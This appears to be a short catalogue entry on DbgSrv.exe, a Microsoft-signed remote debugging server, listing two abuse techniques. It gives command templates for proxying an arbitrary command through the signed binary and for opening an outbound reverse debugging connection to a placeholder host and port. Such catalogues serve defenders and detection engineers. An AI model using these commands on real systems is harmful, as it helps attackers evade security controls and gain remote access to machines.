A process server included with Debugging Tools for Windows for remote user-mode debugging.
Creates a process server and launches the specified command using the DbgSrv.exe -c option.
dbgsrv.exe -t tcp:port=5005 -c {CMD}
Proxy execution of a command through a trusted Microsoft-signed debugging utility.
Establishes an outbound reverse connection from the DbgSrv process server to a remote debugging client using the clicon option. A connected debugging client can subsequently interact with processes through the remote debugging session.
dbgsrv.exe -t tcp:clicon={HOST},port={PORT}
Establish a reverse remote-debugging channel through a trusted Microsoft-signed developer utility.